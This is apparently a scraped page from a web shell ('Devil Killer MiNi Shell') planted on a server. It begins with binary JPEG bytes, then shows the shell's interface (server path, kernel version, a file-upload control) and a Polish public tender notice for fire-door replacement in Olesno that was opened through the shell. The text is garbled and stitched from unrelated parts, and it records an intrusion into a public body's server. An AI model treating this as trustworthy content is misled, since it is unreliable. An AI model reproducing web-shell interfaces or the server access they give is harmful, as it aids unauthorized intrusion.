JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040862901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana drzwi ppoż. na terenie Internatu w OSiW w Oleśnie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Opolska Wojewódzka Komenda OHP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 007003473</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Armii Krajowej 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-071</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">77 453 88 82</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opolska.ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.opolska.ohp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana drzwi ppoż. na terenie Internatu w OSiW w Oleśnie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d71e911b-ef47-454b-92cf-915bec88d725</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00408629</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00238279/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 &#34;Wymiana drzwi ppoż. na terenie Internatu w OSiW w Oleśnie&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d71e911b-ef47-454b-92cf-915bec88d725 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia, komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu Platformy eZamówienia. Adres strony na której jest dostępna: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d71e911b-ef47-454b-92cf-915bec88d725</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie eZamówienia. Szczegółowe informacje na<br/>temat zakładania konta, zasady i warunki korzystania z Platformy eZamówienia określa regulamin dostępny pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu, oraz informacje zamieszczone w zakładce „Centrum Pomocy” –<br/>zawierające interaktywne instrukcje.<br/>Przeglądanie dokumentów zamówienia nie wymaga rejestracji ani logowania – dostępne jest dla wszystkich zainteresowanych.<br/>Cała komunikacja w postępowaniu (wnioski o wyjaśnienia SWZ, wnioski o zwrot wadium, inne informacje, odpowiedzi na wezwania<br/>Zamawiającego) odbywa się wyłącznie za pośrednictwem Platformy eZamówienia. Wysyłanie wiadomości e-mail jest dopuszczalne<br/>wyłącznie w sytuacji awarii Platformy eZamówienia (jednak nie dotyczy to składania ofert).<br/>Sposób komunikacji opisuje instrukcja:<br/>https://media.ezamowienia.gov.pl/pod/2021/10/Komunikacja-w-postepowaniu-5.1.pdf.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 Mb (wielkość dotyczy plików<br/>przesyłanych jako załączniki do jednego formularza).<br/>W przypadku problemów technicznych i awarii można skorzystać ze wsparcia technicznego przez formularz udostępniony na stronie<br/>Platformy w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119/1 z 04.05.2016 r.), dalej<br/>jako „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Wojewódzki Komendant Ochotniczych Hufców Pracy w Opolu.<br/>Z Administratorem można kontaktować się za pośrednictwem:<br/>- poczty tradycyjnej: ul. Armii Krajowej 4, 45-071 Opole<br/>- poczty elektronicznej: owk@opolska.ohp.pl<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan kontaktować<br/>w sprawach przetwarzania Pani/Pana danych osobowych za pośrednictwem:<br/>- poczty tradycyjnej: ul. Armii Krajowej 4, 45-071 Opole<br/>- poczty elektronicznej: iod@opolska.ohp.pl<br/>3. Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. b) i c) RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenia zamówienia publicznego i zawarcia umowy oraz w celu wystawiania faktur, prowadzenia ksiąg<br/>rachunkowych i dokumentacji podatkowej.<br/>4. W przypadku ewentualnych sporów dane osobowe mogą być również przetwarzane w celu dochodzenia roszczeń bądź obrony<br/>praw Administratora - na podstawie art. 6 ust. 1 lit. f) RODO, co stanowi tzw. prawnie uzasadniony interes, którym jest dochodzenie<br/>roszczeń i obrona praw Administratora.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby fizyczne lub prawne, organy publiczne lub inne podmioty, którym<br/>Administrator je ujawnia do celów wynikających w związku z prawnie uzasadnionymi interesami realizowanymi przez Administratora<br/>oraz upoważnieni pracownicy Administratora.<br/>6. Pani/Pana dane osobowe przechowywane będą zgodnie z obowiązującymi przepisami, dane osobowe przetwarzane w celu<br/>dokonywania rozliczeń będą przechowywane przez Administratora przez okres przechowywania dokumentacji księgowej i<br/>podatkowej wynikający z przepisów prawa.<br/>7. Dane przetwarzane w celu dochodzenia roszczeń (np. w postępowaniach sądowych) będą przechowywane przez okres<br/>przedawnienia roszczeń, wynikający z przepisów kodeksu cywilnego.<br/>8. Podanie danych osobowych jest dobrowolne, jednakże odmowa podania danych może skutkować odmową realizacji umowy.<br/>9. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.<br/>22 RODO.<br/>10. Posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych przy czym skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>3) na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do<br/>usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OWK OHP 271/37/2024/ZA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych, w ramach inwestycji pn. „Wymiana drzwi ppoż. na terenie<br/>Internatu w OSiW w Oleśnie” ”, polegających na wymianie istniejących 7 wewnętrznych drzwi przeciwpożarowych,<br/>zlokalizowanych na 6 kondygnacjach klatki schodowej w budynku Internatu Ośrodka Szkolenia i Wychowania w Oleśnie,<br/>posadowionego na nieruchomości, położonej w Oleśnie przy ul. Budowlanych 3, wobec której Zamawiający posiada prawo<br/>do dysponowania na cele budowlane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421110-8 - Instalowanie ram drzwiowych i okiennych</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) Cena – waga kryterium 60 %;<br/>cena najniższa brutto<br/>C= ------------------------------------------------ x 60 pkt<br/>cena oferty ocenianej brutto<br/>spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu<br/>zamówienia.<br/>2) Gwarancja (długość okresu gwarancji jakości na wykonane roboty budowlane) – waga kryterium 40 %;<br/>długość okresu gwarancji jakości na wykonane roboty budowlane oferty badanej<br/>C= ------------------------------------------------ x 40 pkt<br/>najdłuższy okres gwarancji jakości na wykonane roboty budowlane tj. 60 miesięcy<br/>spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>3) W celu oceny oferty, Zamawiający dokona zsumowania uzyskanych przez Wykonawcę punktów z kryterium cena i gwarancja.<br/>a) Zamawiający określa minimalną długość okresu gwarancji jakości na wykonane roboty budowlane, na 36 miesięcy, maksymalną<br/>długość okresu gwarancji jakości na wykonane roboty budowlane na 60 miesięcy. Okres gwarancji jakości na wykonane roboty<br/>budowlane należy podać w pełnych miesiącach.<br/>b) W przypadku zaoferowania okresu gwarancji jakości na wykonane roboty budowlane:<br/>- krótszego niż 36 miesięcy, Zamawiający odrzuci ofertę;<br/>- w przypadku, gdy Wykonawca nie wpisze w Formularzu ofertowym oferowanego okresu gwarancji jakości na wykonane roboty<br/>budowlane, Zamawiający uzna, że Wykonawca zaoferował najniższy, wymagany przez Zamawiającego okres gwarancji jakości na<br/>wykonane roboty budowlane;<br/>- dłuższego niż 60 miesięcy, Zamawiający przyzna maksymalną ilość punktów, tj. 40, a Wykonawca zobowiązany będzie udzielić<br/>gwarancji jakości na wykonane roboty budowlane zgodnie z ofertą.<br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta nie będzie podlegała odrzuceniu i zostanie uznana za<br/>najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału<br/>w postępowaniu i wymagania określone w niniejszej SWZ.<br/>2. Zamawiający, na podstawie art. 112 ustawy Pzp określa następujące warunki udziału w postępowaniu:<br/>2.1 Sytuacja ekonomiczna lub finansowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji<br/>ekonomicznej lub finansowej.<br/>1) Zamawiający nie wyznacza szczegółowego warunku udziału w postępowaniu.<br/>2.2 Zdolność techniczna lub zawodowa<br/>W celu spełnienia warunku Wykonawca musi wykazać, że:<br/>1) warunek zostanie spełniony jeśli wykonawca wykaże, że nie wcześniej niż w okresie ostatnich pięciu lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty<br/>budowlane o wartości robót co najmniej 50 000,00 zł brutto każda.<br/>Warunek zostanie uznany przez Zamawiającego, gdy Wykonawca poda zakres robót, wartości oraz datę i miejsce<br/>wykonania oraz załączy dokumenty potwierdzające, że robota budowlana była wykonana należycie (np. referencje lub inny<br/>dokument)<br/>2.3 Zdolność do występowania w obrocie gospodarczym<br/>1) O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania<br/>zdolności do występowania w obrocie gospodarczym.<br/>1) Zamawiający nie wyznacza szczegółowego warunku udziału w postępowaniu.<br/>2.4 Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów<br/>1) O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>1) Zamawiający nie wyznacza szczegółowego warunku udziału w postępowaniu.<br/>3. Podstawy wykluczenia wykonawcy z postępowania<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z udziału w postępowaniu na<br/>podstawie art. 108 ust. 1 ustawy Pzp.<br/>Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę:<br/>1) wobec którego zachodzą podstawy wykluczenia określone w art. 108 ustawy Pzp;<br/>Z postępowania o udzielenie zamówienia wyklucza się wykonawcę:<br/>A. będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie przestępstwa lub przestępstwa<br/>skarbowego, o którym mowa w art. 258 Kodeksu karnego (art. 108 ust. 1 pkt 1 lit. a Pzp),<br/>b) handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego (art. 108 ust. 1 pkt 1 lit. b Pzp),<br/>c) o którym mowa w art. 228-230a, art. 250a Kodeksu karnego lub w art. 46 lub art. 48 ustawy z dnia 25 czerwca 2010 r. o<br/>sporcie, lub w art. 54ust. 1-4 ustawy o refundacji leków, środków spożywczych specjalnego przeznaczenia żywieniowego<br/>oraz wyrobów medycznych (art. 108 ust. 1 pkt 1 lit. c Pzp),<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a Kodeksu karnego, lub<br/>przestępstwo udaremniania lub utrudniania stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich<br/>pochodzenia, o którym mowa w art. 299 Kodeksu karnego (art. 108 ust. 1 pkt 1 lit. d Pzp),<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 § 20 Kodeks karnego, lub mające na celu popełnienie tego<br/>przestępstwa (art. 108 ust. 1 pkt 1 lit. e Pzp),<br/>f) powierzenia wykonywania pracy małoletniemu cudzoziemcowi, o który mowa w art. 9 ust. 2 ustawy z dnia 15 czerwca<br/>2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium<br/>Rzeczypospolitej Polskiej (art. 108 ust. 1 pkt 1 lit. f Pzp),<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296-307 Kodeksu karnego, przestępstwo oszustwa, o którym<br/>mowa w art. 286 Kodeksu karnego, przestępstwo przeciwko wiarygodności dokumentów, o których mowa w art. 270-277d<br/>Kodeksu karnego, lub przestępstwo skarbowe (art. 108 ust. 1 pkt 1 lit. g Pzp),<br/>h) o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy<br/>cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej (art. 108 ust. 1 pkt 1 lit. h Pzp) -<br/>lub za odpowiedni czyn zabroniony określony w przepisach prawa obcego;<br/>B. jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub<br/>partnerskiej albo komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie<br/>skazano za przestępstwo, o którym mowa w pkt 1 (art. 108 ust. 1 pkt 2 Pzp);<br/>C. wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem<br/>podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed upływem<br/>terminu do składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert<br/>dokonał płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności (art. 108 ust. 1 pkt 3 Pzp);<br/>D. wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne (art. 108 ust. 1 pkt 4 Pzp);<br/>E. jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi<br/>wykonawcami porozumienie mające na celu zakłócenie konkurencji, w szczególności, jeżeli należąc do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty,<br/>chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie (art. 108 ust. 1 pkt 5 Pzp);<br/>F. jeżeli, w przypadkach, o których mowa w art. 85 ust. 1 Pzp, doszło do zakłócenia konkurencji 